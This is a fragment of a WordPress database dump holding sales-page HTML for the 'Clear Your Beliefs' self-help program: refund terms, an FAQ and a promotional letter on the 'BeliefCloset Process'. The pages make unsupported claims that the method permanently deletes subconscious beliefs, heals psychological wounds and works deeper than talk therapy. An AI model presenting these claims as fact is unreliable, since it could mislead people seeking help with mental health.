eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-04-14 15:37:18', '2015-04-14 20:37:18', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2161, 2, '2015-05-12 12:49:27', '2015-05-12 17:49:27', '<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  